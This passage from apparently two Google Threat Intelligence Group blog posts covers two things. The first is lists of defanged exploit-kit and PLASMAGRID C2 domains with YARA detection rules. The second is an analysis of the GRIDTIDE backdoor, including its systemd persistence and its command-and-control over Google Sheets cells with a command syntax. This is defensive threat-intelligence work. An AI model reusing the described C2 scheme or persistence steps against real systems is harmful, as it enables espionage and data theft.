baseline;">https://7ff[.]online/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://cy8[.]top/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://7uspin[.]us/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://seven7[.]to/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://4kgame[.]us/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://share[.]7p[.]game/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://www[.]appstoreconn[.]com/xmweb/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://k96[.]icu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://7fun[.]icu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://n49[.]top/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://98a[.]online/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://spin7[.]icu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://t7c[.]icu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://7p[.]game/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://lddx3z2d72aa8i6[.]xyz/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://anygg[.]liquorfight[.]com/88k4ez/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://goanalytics[.]xyz/88k4ez/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">http://land[.]77bingos[.]com/88k4ez/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://land[.]bingo777[.]now/88k4ez/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">http://land[.]bingo777[.]now/88k4ez/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">http://land[.]777bingos[.]xyz/88k4ez/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://btrank[.]top/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://dd9l7e6ghme8pbk[.]xyz/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://res54allb[.]xn--xkrsa0078bd6d[.]com/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://fxrhcnfwxes90q[.]xyz/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://kanav[.]blog/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://3v5w1km5gv[.]xyz/group[.]html</span></p> </td> </tr> </tbody> </table></div> </div> </div></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">PLASMAGRID C2 domains</span></strong></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vvri8ocl4t3k8n6.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">rlau616jc7a7f7i.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ol67el6pxg03ad7.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">6zvjeulzaw5c0mv.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ztvnhmhm4zj95w3.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">v2gmupm7o4zihc3.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">pen0axt0u476duw.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hfteigt3kt0sf3z.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">xfal48cf0ies7ew.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">yvgy29glwf72qnl.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">lk4x6x2ejxaw2br.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2s3b3rknfqtwwpo.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">xjslbdt9jdijn15.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hui4tbh9uv9x4yi.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">xittgveqaufogve.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">xmmfrkq9oat1daq.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">lsnngjyu9x6vcg0.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">gdvynopz3pa0tik.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">o08h5rhu2lu1x0q.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">zcjdlb5ubkhy41u.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8fn4957c5g986jp.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">uawwydy3qas6ykv.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">sf2bisx5nhdkygn3l.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">roy2tlop2u.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">gqjs3ra34lyuvzb.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">eg2bjo5x5r8yjb5.xyz</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">b38w09ecdejfqsf.xyz</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4>YARA Rules</h4></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_Exploit_MapJoinEncoder_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = /\[[^\]]+\]\.map\(\w\s*=&gt;.{0,15}String\.fromCharCode\(\w\s*\^\s*(\d+)\).{0,15}\.join\(""\)/ $fp1 = "bot|googlebot|crawler|spider|robot|crawling" condition: 1 of ($s*) and not any of ($fp*) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_PLASMAGRID_Strings_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $ = "com.plasma.appruntime.appdiscovery" $ = "com.plasma.appruntime.downloadmanager" $ = "com.plasma.appruntime.hotupdatemanager" $ = "com.plasma.appruntime.modulestore" $ = "com.plasma.appruntime.netconfig" $ = "com.plasma.bundlemapper" $ = "com.plasma.event.upload.serial" $ = "com.plasma.notes.monitor" $ = "com.plasma.photomonitor" $ = "com.plasma.PLProcessStateDetector" $ = "plasma_heartbeat_monitor" $ = "plasma_injection_dispatcher" $ = "plasma_ipc_processor" $ = "plasma_%@.jpg" $ = "/var/mobile/Library/Preferences/com.plasma.photomonitor.plist" $ = "helion_ipc_handler" $ = "PLInjectionStateInfo" $ = "PLExploitationInterface" condition: 1 of them }</code></pre></div>Tue, 03 Mar 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit/Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign/<div class="block-paragraph_advanced"><h3 style="text-align: justify;"><span style="vertical-align: baseline;">Introduction</span></h3> <p><span style="vertical-align: baseline;">Last week, Google Threat Intelligence Group (GTIG), Mandiant, and partners took action to disrupt a global espionage campaign targeting telecommunications and government organizations in dozens of nations across four continents. The threat actor, UNC2814, is a suspected People's Republic of China (PRC)-nexus cyber espionage group that GTIG has tracked since 2017. This prolific, elusive actor has a long history of targeting international governments and global telecommunications organizations across Africa, Asia, and the Americas and had confirmed intrusions in 42 countries when the disruption was executed. The attacker was using API calls to communicate with SaaS apps as command-and-control (C2) infrastructure to disguise their malicious traffic as benign, a common tactic used by threat actors when attempting to improve the stealth of their intrusions. Rather than abusing a weakness or security flaw, attackers rely on cloud-hosted products to function correctly and make their malicious traffic seem legitimate. This disruption, led by GTIG in partnership with other teams, included the following actions: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Terminating all Google Cloud Projects controlled by the attacker, effectively severing their persistent access to environments compromised by the novel GRIDTIDE backdoor.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Identifying and disabling all known UNC2814 infrastructure. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Disabling attacker accounts and revoked access to the Google Sheets API calls leveraged by the actor for command-and-control (C2) purposes.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Releasing a set of IOCs linked to UNC2814 infrastructure active since at least 2023. </span></p> </li> </ul> <p><span style="vertical-align: baseline;">GTIG’s understanding of this campaign was accelerated by a recent </span><a href="https://cloud.google.com/security/products/mandiant-managed-threat-hunting"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant Threat Defense</span></a><span style="vertical-align: baseline;"> investigation into UNC2814 activity. Mandiant discovered that UNC2814 was leveraging a novel backdoor tracked as GRIDTIDE. This activity is not the result of a security vulnerability in Google’s products; rather, it abuses legitimate Google Sheets API functionality to disguise C2 traffic.</span></p> <p><span style="vertical-align: baseline;">As of Feb. 18, GTIG's investigation confirmed that UNC2814 has impacted 53 victims in 42 countries across four continents, and identified suspected infections in at least 20 more countries. It is important to highlight that UNC2814 has no observed overlaps with activity publicly reported as “Salt Typhoon,” and targets different victims globally using distinct tactics, techniques, and procedures (TTPs). Although the specific initial access vector for this campaign has not been determined, UNC2814 has a history of gaining entry by exploiting and compromising web servers and edge systems.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gridtide-distruption-fig1.max-1000x1000.jpg" alt="GRIDTIDE infection lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="aol3x">Figure 1:GRIDTIDE infection lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Initial Detection</span></h3> <p><span style="vertical-align: baseline;">Mandiant leverages </span><a href="https://cloud.google.com/security/products/security-operations"><span style="text-decoration: underline; vertical-align: baseline;">Google Security Operations</span></a><span style="vertical-align: baseline;"> (SecOps) to perform continuous detection, investigation, and response across our global customer base. During this investigation, a detection flagged suspicious activity on a CentOS server.</span></p> <p><span style="vertical-align: baseline;">In this case, Mandiant’s investigation revealed a suspicious process tree: the binary </span><code style="vertical-align: baseline;">/var/tmp/xapt</code><span style="vertical-align: baseline;"> initiated a shell with </span><span style="vertical-align: baseline;">root</span><span style="vertical-align: baseline;"> privileges. The binary then executed the command</span><span style="vertical-align: baseline;"> </span><code style="vertical-align: baseline;">sh -c id 2&gt;&amp;1</code><span style="vertical-align: baseline;"> to retrieve the system's user and group identifiers. This reconnaissance technique enabled the threat actor to confirm their successful privilege escalation to </span><span style="vertical-align: baseline;">root</span><span style="vertical-align: baseline;">. Mandiant analysts triaged the alert, confirmed the malicious intent, and reported the activity to the customer. This rapid identification of a sophisticated threat actor’s TTPs demonstrates the value of Google Cloud’s </span><a href="https://cloud.google.com/security/shared-fate"><span style="text-decoration: underline; vertical-align: baseline;">Shared Fate</span></a><span style="vertical-align: baseline;"> model, which provides organizations with curated, out-of-the-box (OOB) detection content designed to help organizations better defend against modern intrusions.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>[Process Tree] /var/tmp/xapt └── /bin/sh └── sh -c id 2&gt;&amp;1 └── [Output] uid=0(root) gid=0(root) groups=0(root)</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The payload was likely named </span><code style="vertical-align: baseline;">xapt</code><span style="vertical-align: baseline;"> to masquerade as the legacy tool used in Debian-based systems.</span></p> <h3><span style="vertical-align: baseline;">Post-Compromise Activity</span></h3> <p><span style="vertical-align: baseline;">The threat actor used a service account to move laterally within the environment via SSH. Leveraging living-off-the-land (LotL)binaries, the threat actor performed reconnaissance activities, escalated privileges, and set up persistence for the GRIDTIDE backdoor.</span></p> <p><span style="vertical-align: baseline;">To achieve persistence, the threat actor created a service for the malware at </span><code style="vertical-align: baseline;">/etc/systemd/system/xapt.service</code><span style="vertical-align: baseline;">, and once enabled, a new instance of the malware was spawned from </span><code style="vertical-align: baseline;">/usr/sbin/xapt</code><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">The threat actor initially executed GRIDTIDE via the command </span><code style="vertical-align: baseline;">nohup ./xapt</code><span style="vertical-align: baseline;">. This allows the backdoor to continue running even after the session is closed.</span></p> <p><span style="vertical-align: baseline;">Subsequently, SoftEther VPN Bridge was deployed to establish an outbound encrypted connection to an external IP address. VPN configuration metadata suggests UNC2814 has been leveraging this specific infrastructure since July 2018.</span></p> <p><span style="vertical-align: baseline;">The threat actor dropped GRIDTIDE on to an endpoint containing personally identifiable information (PII), including:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Full name</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Phone number</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Date of birth</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Place of birth</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Voter ID number</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">National ID number</span></p> </li> </ul> <p><span style="vertical-align: baseline;">We assess the targeting of PII in this engagement is consistent with cyber espionage activity in telecommunications, which is primarily leveraged to identify, track, and monitor persons of interest. We expect UNC2814 used this access to exfiltrate a variety of data on persons and their communications. Similar campaigns have been used to exfiltrate call data records, monitor SMS messages, and to even monitor targeted individuals through the telco’s lawful intercept capabilities.</span></p> <p><span style="vertical-align: baseline;">GTIG did not directly observe UNC2814 exfiltrate sensitive data during this campaign. However, historical PRC-nexus espionage intrusions against telecoms have resulted in the theft of call data records, unencrypted SMS messages, and the compromise and abuse of lawful intercept systems. This focus on sensitive communications historically is intended to enable the targeting of individuals and organizations for surveillance efforts, particularly dissidents and activists, as well as traditional espionage targets. The access UNC2814 achieved during this campaign would likely enable clandestine efforts to similarly surveil targets. </span></p> <h3><span style="vertical-align: baseline;">GRIDTIDE</span></h3> <p><span style="vertical-align: baseline;">GRIDTIDE is a sophisticated C-based backdoor with the ability to execute arbitrary shell commands, upload files, and download files. The backdoor leverages Google Sheets as a high-availability C2 platform, treating the spreadsheet not as a document, but as a communication channel to facilitate the transfer of raw data and shell commands. GRIDTIDE hides its malicious traffic within legitimate cloud API requests, evading standard network detection. While the GRIDTIDE sample FLARE analyzed as part of this campaign leverages Google Sheets for its C2, the actor could easily make use of other cloud-based spreadsheet platforms in the same manner.</span></p> <h4><span style="vertical-align: baseline;">Google Sheets</span></h4> <p><span style="vertical-align: baseline;">GRIDTIDE expects a 16-byte cryptographic key to be present in a separate file on the host at the time of execution. The malware uses this key to decrypt its Google Drive configurations using AES-128 in Cipher Block Chaining (CBC) mode.</span></p> <p><span style="vertical-align: baseline;">The Google Drive configuration data contains the service account associated with UNC2814’s Google Sheets document, and a private key for the account. It also contains the Google Spreadsheet ID and the private key to access the document. GRIDTIDE then connects to the malicious Google Spreadsheet using the </span><a href="https://docs.cloud.google.com/iam/docs/service-account-overview"><span style="text-decoration: underline; vertical-align: baseline;">Google Service Account</span></a><span style="vertical-align: baseline;"> for API authentication (the threat actor’s Google Service Account and associated Google Workspace have been disabled).</span></p> <p><span style="vertical-align: baseline;">When executed, GRIDTIDE sanitizes its Google Sheet. It does this by deleting the first 1000 rows, across columns</span><span style="vertical-align: baseline;"> A </span><span style="vertical-align: baseline;">to</span><span style="vertical-align: baseline;"> Z </span><span style="vertical-align: baseline;">in the spreadsheet, by using the Google Sheets API </span><code style="vertical-align: baseline;">batchClear</code><span style="vertical-align: baseline;"> method. This prevents previous commands or file data stored in the Sheet from interfering with the threat actor’s current session.</span></p> <p><span style="vertical-align: baseline;">Once the Sheet is prepared, the backdoor conducts host-based reconnaissance. It fingerprints the endpoint by collecting the victim’s username, endpoint name, OS details, local IP address, and environmental data such as the current working directory, language settings, and local time zone. This information is then exfiltrated and stored in cell </span><span style="vertical-align: baseline;">V1</span><span style="vertical-align: baseline;"> of the attacker-controlled spreadsheet.</span></p> <h4><span style="vertical-align: baseline;">Command Syntax</span></h4> <p><span style="vertical-align: baseline;">The threat actor issues instructions using a four-part command syntax: </span><code style="vertical-align: baseline;">&lt;type&gt;-&lt;command_id&gt;-&lt;arg_1&gt;-&lt;arg_2&gt;</code><span style="vertical-align: baseline;">.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">&lt;type&gt;</code><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Commands originating from the threat actor are categorized as type</span><span style="vertical-align: baseline;"> C</span><span style="vertical-align: baseline;"> (Client).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">&lt;command_id&gt;</code></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">C</code><span style="vertical-align: baseline;"> (Command): Executes Base64-encoded Bash shell commands on the endpoint and redirects the output to the spreadsheet.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">U</code><span style="vertical-align: baseline;"> (Upload): Upload the data stored in the cells </span><code style="vertical-align: baseline;">A2:A&lt;arg_2&gt;</code><span style="vertical-align: baseline;"> to the target endpoint, reconstruct and write to the encoded file path</span><span style="vertical-align: baseline;"> </span><code style="vertical-align: baseline;">&lt;arg_1&gt;</code><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">D</code><span style="vertical-align: baseline;"> (Download): Reads the data from the encoded local file path on the endpoint</span><span style="vertical-align: baseline;"> </span><code style="vertical-align: baseline;">&lt;arg_1&gt;</code><span style="vertical-align: baseline;"> and transfers the contents in 45-KB fragments to the spreadsheet across the </span><code style="vertical-align: baseline;">A2:An</code><span style="vertical-align: baseline;"> range.</span></p> </li> </ul> </ul> <p><span style="vertical-align: baseline;">In response, the malware posts a Server (</span><code style="vertical-align: baseline;">S</code><span style="vertical-align: baseline;">) status message to cell </span><code style="vertical-align: baseline;">A1</code><span style="vertical-align: baseline;">, confirming the successful completion of the task (</span><code style="vertical-align: baseline;">R</code><span style="vertical-align: baseline;">) or returning an error:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">&lt;type&gt;</code><span style="vertical-align: baseline;"> Responses originating from the malware are categorised as type </span><code style="vertical-align: baseline;">S</code><span style="vertical-align: baseline;"> (Server).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">&lt;command_id&gt;</code><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Will match the </span><code style="vertical-align: baseline;">&lt;command_id&gt;</code><span style="vertical-align: baseline;"> value sent by the threat actor.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">&lt;arg_1&gt;</code><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Indicating the command executed successfully (</span><code style="vertical-align: baseline;">R</code><span style="vertical-align: baseline;">), or an error message.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">&lt;arg_2&gt;</code><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Exfiltrated data is saved within the range</span><span style="vertical-align: baseline;"> </span><code style="vertical-align: baseline;">A2:A&lt;arg_2&gt;</code><span style="vertical-align: baseline;">. This value displays the upper cell number of the data.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Cell-Based C2</span></h4> <p><span style="vertical-align: baseline;">GRIDTIDE’s C2 communication works on a cell-based polling mechanism, assigning specific roles to spreadsheet cells to facilitate communication.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">A1</code><span style="vertical-align: baseline;">: The malware polls this cell via the Google Sheets API for attacker commands, and subsequently overwrites it with a status response upon completion (e.g., </span><code style="vertical-align: baseline;">S-C-R</code><span style="vertical-align: baseline;"> or Server-Command-Success. If no command exists in the cell, the malware sleeps for one second before trying again. If the number of trials reaches 120, it changes the sleep time to be a random duration between 5–10 minutes, likely to reduce noise when the threat actor is not active. When a command does exist in the cell, GRIDTIDE executes it and resets the wait time to one second.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">A2-An</code><span style="vertical-align: baseline;">: Used for the transfer of data, such as command output, uploading tools, or exfiltrating files.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">V1</code><span style="vertical-align: baseline;">: Stores system data from the victim endpoint. When executed, the malware updates this cell with an encoded string containing host-based metadata.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Obfuscation and Evasion</span></h4> <p><span style="vertical-align: baseline;">To evade detection and web filtering, GRIDTIDE employs a URL-safe Base64 encoding scheme for all data sent and received. This encoding variant replaces standard Base64 characters (</span><code style="vertical-align: baseline;">+</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">/</code><span style="vertical-align: baseline;">) with alternatives (</span><code style="vertical-align: baseline;">-</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">_</code><span style="vertical-align: baseline;">).</span></p> <h4><span style="vertical-align: baseline;">Command Execution Lifecycle</span></h4></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gridtide-distruption-fig2.max-1000x1000.jpg" alt="GRIDTIDE execution lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="aol3x">Figure 2: GRIDTIDE execution lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3>Targeting</h3></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/gridtide-distruption-fig3a.png" alt="Countries with suspected or confirmed UNC2814 victims"> </a> <figcaption class="article-image__caption "><p data-block-key="aol3x">Figure 3: Countries with suspected or confirmed UNC2814 victims</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">UNC2814 is a suspected PRC-nexus threat actor that has conducted global operations since at least 2017. The group's recent activity leveraging GRIDTIDE malware has primarily focused on targeting telecommunications providers on a worldwide scale, but UNC2814 also targeted government organizations during this campaign. </span></p> <p><span style="vertical-align: baseline;">GTIG confirmed 53 intrusions by UNC2814 in 42 total nations globally, and identified suspected targeting in at least 20 other nations. This prolific scope is likely the result of a decade of concentrated effort.</span></p> <h3><span style="vertical-align: baseline;">Disrupting UNC2814</span></h3> <p><span style="vertical-align: baseline;">GTIG is committed to actively countering and disrupting malicious operations, ensuring the safety of our customers and mitigating the global impact of this malicious cyber activity. </span></p> <p><span style="vertical-align: baseline;">To counter UNC2814’s operations, GTIG executed a series of coordinated disruption actions:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Elimination of GRIDTIDE Access: We terminated all Cloud Projects controlled by the attacker, effectively severing their persistent access to environments compromised by the GRIDTIDE backdoor.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Infrastructure Takedown: In collaboration with partners, we identified and disabled all known UNC2814 infrastructure. This included the sinkholing of both current and historical domains used by the group in order to further dismantle UNC2814’s access to compromised environments.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Account Disruption: GTIG and its partners disabled attacker accounts, revoked access to the Google Sheets, and disabled all Google Cloud projects leveraged by the actor for command-and-control (C2) purposes.</span></p> 